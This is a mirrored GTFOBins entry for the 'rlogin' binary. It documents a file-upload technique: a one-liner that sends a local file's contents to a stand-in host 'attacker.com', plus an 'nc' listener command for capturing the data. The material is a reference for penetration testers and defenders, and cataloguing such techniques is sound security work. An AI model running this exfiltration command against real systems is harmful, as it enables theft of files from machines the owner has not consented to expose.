mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-10-22 16:48:09 +02:00
9652aee337
Close #45.
18 lines
628 B
Markdown
18 lines
628 B
Markdown
---
|
|
description: |
|
|
Usually `rlogin` is a symlink to `ssh`, the following works only when the *real* `rlogin` is used (e.g., from the `rsh-client` APT package).
|
|
functions:
|
|
file-upload:
|
|
- description: |
|
|
Send contents of a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents.
|
|
|
|
`rlogin` hangs waiting for the remote peer to close the socket.
|
|
|
|
The file is corrupted by leading and trailing spurious data.
|
|
code: |
|
|
RHOST=attacker.com
|
|
RPORT=12345
|
|
LFILE=file_to_send
|
|
rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST
|
|
---
|